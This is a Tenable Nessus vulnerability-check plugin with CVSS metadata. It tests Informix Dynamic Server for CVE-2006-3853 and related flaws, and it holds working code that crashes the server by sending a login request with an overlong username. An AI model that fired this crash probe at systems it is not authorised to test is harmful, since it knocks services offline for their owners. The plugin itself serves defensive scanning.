CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
93.3%
The version of Informix Dynamic Server installed on the remote host contains multiple vulnerabilities that may allow attackers to execute arbitrary code, gain elevated privileges, uncover sensitive information, deny service to legitimate users, etc. Some of these issues can be exploited remotely without authentication.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(22229);
script_version("1.12");
script_cve_id("CVE-2006-3853", "CVE-2006-3855", "CVE-2006-3856", "CVE-2006-3857",
"CVE-2006-3858", "CVE-2006-3860", "CVE-2006-3861", "CVE-2006-3862");
script_bugtraq_id(19264);
script_name(english:"Informix Dynamic Server Multiple Remote Vulnerabilities");
script_summary(english:"Tries to crash Informix Dynamic Server with a long username");
script_set_attribute(attribute:"synopsis", value:
"The remote host contains an application that is affected by several
vulnerabilities." );
script_set_attribute(attribute:"description", value:
"The version of Informix Dynamic Server installed on the remote host
contains multiple vulnerabilities that may allow attackers to execute
arbitrary code, gain elevated privileges, uncover sensitive
information, deny service to legitimate users, etc. Some of these
issues can be exploited remotely without authentication." );
script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg21242921" );
script_set_attribute(attribute:"solution", value:
"Upgrade to Informix 10.00.xC4 / 9.40.xD8 / 7.31.xD9 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2006/08/16");
script_set_attribute(attribute:"vuln_publication_date", value: "2006/07/31");
script_cvs_date("Date: 2018/07/12 19:01:15");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_DENIAL);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
script_dependencies("informix_detect.nasl");
script_require_ports("Services/informix", 1526);
exit(0);
}
include("byte_func.inc");
include("misc_func.inc");
port = get_kb_item("Services/informix");
if (!port) port = 1526;
if (!get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (!soc) exit(0);
# Try to log in with a long username.
user = crap(0x410);
pass = SCRIPT_NAME;
db = "sysmaster";
dbpath = "ol_nessus";
zero = raw_string(0x00);
req = raw_string(
"sq", # header
crap(8), # length + constant (to be filled in later)
"sqlexec ", # magic
user, " -p", pass, " ", # credentials
"9.22.TC1 ", # client version
"RDS#N000000 ", # RDS
"-d", db, " ", # database
"-fIEEEI ", # IEEE
"DBPATH=//", dbpath, " ", # dbpath
"CLIENT_LOCALE=en_US.CP1252 ", # client locale
"DB_LOCALE=en_US.819 ", # db locale
":",
"AG0AAAA9b3IAAAAAAAAAAAA9c29jdGNwAAAAAAABAAABMQAAAAAAAAAAc3FsZXh",
"lYwAAAAAAAAVzcWxpAAACAAAAAwAKb2xfbmVzc3VzAABrAAAAAAAAnmUAAAAAAA",
"duZXNzdXMAAAduZXNzdXMAAC1DOlxQcm9ncmFtIEZpbGVzXE5lc3N1c1xpbmZvc",
"m1peF9kZXRlY3QubmFzbAAAdAAIAAAE0gAAAAAAfwo="
);
req = insstr(req, base64(str:raw_string(mkword(strlen(req)-4), 0x01, 0x3d, zero, zero)), 2, 9);
send(socket:soc, data:req);
res = recv(socket:soc, length:4096, timeout:20);
close(soc);
# If we didn't get a response...
if (isnull(res))
{
# Check for a bit to see if it's down.
max_tries = 3;
for (try=0; try<max_tries; try++)
{
sleep(5);
soc = open_sock_tcp(port);
if (soc) close(soc);
else
{
security_hole(port);
exit(0);
}
}
}
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3853
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3855
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3856
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3857
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3858
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3860
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3861
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3862
www-1.ibm.com/support/docview.wss?uid=swg21242921